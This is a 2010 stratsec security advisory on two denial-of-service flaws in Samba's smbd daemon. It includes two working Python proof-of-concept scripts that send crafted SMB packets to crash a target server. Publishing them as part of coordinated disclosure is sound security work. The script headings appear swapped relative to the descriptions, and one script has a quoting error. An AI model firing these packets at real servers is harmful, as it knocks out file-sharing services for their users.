Samba Multiple DoS Vulnerabilities (SS-2010-005)

May 12, 2010

 

  • Title: Samba Multiple DoS Vulnerabilities
  • Version: 1.0
  • Issue type: Multiple
  • Affected vendor: Samba
  • Release date: 12/05/2010
  • Discovered by: Laurent Gaffié
  • Issue status: Patch available

Summary

Two vulnerabilities were discovered within in the Samba Smbd daemon which allow an attacker to trigger a null pointer dereference or an uninitialized variable read by sending a specific ‘Sessions Setup AndX’ query. Successful exploitation of these issues will result in a denial of service.

Description

The Server Message Block (SMB) protocol, also known as Common Internet File System (CIFS) acts as an application-layer protocol to provide shared access to files, printers and Inter-Process Communication (IPC). It is also a transport for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) operations. After negotiating an SMB communication the client sends a ‘Session Setup AndX’ packet to negotiate a session in order to be able to connect on a specific share.

To trigger the null pointer dereference, the client needs to send a crafted SMB ‘Negotiate Protocol’ query with the SMB header ‘Flags2’ set to ‘0x0003’ (no Unicode), followed by a Session Setup AndX request with the SMB header ‘Flags2’ set to ‘0x8003’ (Unicode). This sequence will result in a crash within the Smbd process.

The uninitialised Variable Read issue, can be triggered if the client sends a crafted ‘Session Setup AndX’ with a ‘security blob length’ value set to ‘\xff\xff’.

Impact

A remote attacker can cause a denial of service within the Samba daemon

Affected products

Samba <=3.4.7 and Samba <= 3.5.1

Proof of concept

To trigger the uninitialised variable read issue, the following Python proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1: 
 sys.exit('Usage: python smbd.py 10.0.0.12’)

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

To trigger the null pointer dereference issue this Python proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1: 
 sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

Solution

Update to version 3.5.2 or 3.4.8 (http://samba.org/)

Response timeline

  • 09/03/2010 – Null pointer dereference issue reported to vendor.
  • 09/03/2010 – Vendor acknowledges receipt of advisory 2 hours after receiving the initial email
  • 09/03/2010 – Vendor confirms issue presence, and provide a patch 3 hours after receiving the initial email.
  • 09/03/2010 – stratsec confirms patch resolves issue.
  • 15/03/2010 – Uninitialised Variable Read issue reported to vendor.
  • 15/03/2010 – Vendor confirms the issue and provides a patch 5 hours after receiving the initial email.
  • 15/03/2010 – stratsec confirms patch resolves issue
  • 07/04/2010 – Version 3.5.2 released by the vendor fixing both issues.
  • 11/05/2010 – Version 3.4.8 released by the vendor fixing both issues.
  • 12/05/2010 - This advisory published.

References
 

Download advisory: SS-2010-005 stratsec Samba Multiple Vulnerabilities Security Advisory v1.0.pdf

stratsec would like to thanks the Samba Security Team for their responsiveness while handling theses issues.